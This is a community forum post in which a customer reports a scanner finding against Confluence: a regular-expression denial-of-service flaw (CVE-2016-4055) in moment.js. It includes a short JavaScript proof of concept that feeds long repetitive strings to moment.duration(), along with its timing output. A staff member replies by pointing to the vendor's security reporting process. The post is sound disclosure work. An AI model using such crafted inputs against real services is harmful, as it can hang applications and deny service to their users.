Confluence Security Weakness Sonatype CWE: 400


Our security team performed a security scan on Confluence 6.21 and found a security issue and the detials are provided below. We could only adopt for production use, if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue, before they procure Confluence. 


Severity Sonatype CVSS 3.0: 7.5

Weakness Sonatype CWE: 400

Explanation The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS). "

Proof of concept:

var moment = require('moment');  

var genstr = function (len, chr) {      var result = "";     

for (i=0; i<=len; i++) {          result = result + chr;      }        return result; }     for (i=20000;i<=10000000;i=i+10000) {      console.log("COUNT: " + i);     

var str = '-' + genstr(i, '1')      console.log("LENGTH: " + str.length);      var start = process.hrtime();      moment.duration(str)        var end = process.hrtime(start);      console.log(end); }      

Results $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] "

Reference Link: Note: CVE-2016-4055 has been assigned to this vulnerability. Detection The application is vulnerable by using this package. Recommendation We recommend upgrading to a version of this component that is not vulnerable to this specific issue. Categories Data

Root Cause moment : 2.5.0

Advisories Project:  

1 answer

0 votes
Ann Worley Atlassian Team Aug 21, 2017

Our security team has asked me to direct you to How to Report a Security Issue.

It would be great if you could follow up on this forum to let the Community know the result.

Suggest an answer

Log in or Sign up to answer
Community showcase
Published Mar 12, 2019 in Confluence

Confluence Admin Certification now $150 for Community Members

More and more people are building their careers with Atlassian, and we want you to be at the front of this wave! Important Dates Start the Certification Prep Course by 2 April 2019 Take your e...

1,023 views 2 13
Read article

Atlassian User Groups

Connect with like-minded Atlassian users at free events near you!

Find a group

Connect with like-minded Atlassian users at free events near you!

Find my local user group

Unfortunately there are no AUG chapters near you at the moment.

Start an AUG

You're one step closer to meeting fellow Atlassian users at your local meet up. Learn more about AUGs

Groups near you